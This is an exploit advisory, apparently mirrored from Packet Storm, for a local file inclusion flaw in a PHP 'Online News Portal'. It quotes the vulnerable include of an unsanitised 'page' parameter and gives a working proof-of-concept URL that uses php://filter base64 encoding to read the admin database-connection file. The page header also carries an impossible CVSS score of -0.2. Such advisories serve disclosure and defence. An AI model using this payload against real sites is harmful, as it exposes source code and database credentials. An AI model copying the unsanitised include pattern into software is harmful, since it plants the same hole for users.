Exploit for Online News Portal Local File Inclusion

Name: Exploit for Online News Portal Local File Inclusion
Rating: 5 (535 reviews)

2020-11-17 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:160099
# Exploit Title: Online News Portal - Local File Inclusion  
# Date: 2020-11-16  
# Exploit Author: gh1mau   
# Email: gh1mau.rulez@gmail.com  
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/  
# Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14600&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code  
# Software Release Data: November 16, 2020  
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)  
  
Vulnerable File:  
----------------   
/index.php  
  
Vulnerable Code:  
-----------------  
Entry point:  
line 26: $page = isset($_GET['page']) ? $_GET['page'] : 'home';  
  
Exit point:  
line 27: include $page.'.php';  
  
Vulnerable Issue:  
-----------------  
Attacker could load and read any file from the application (page= parameter from index.php) (with .php extension) and decode the base64 response to read the source code.  
  
POC:  
----  
http://localhost/news_portal/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect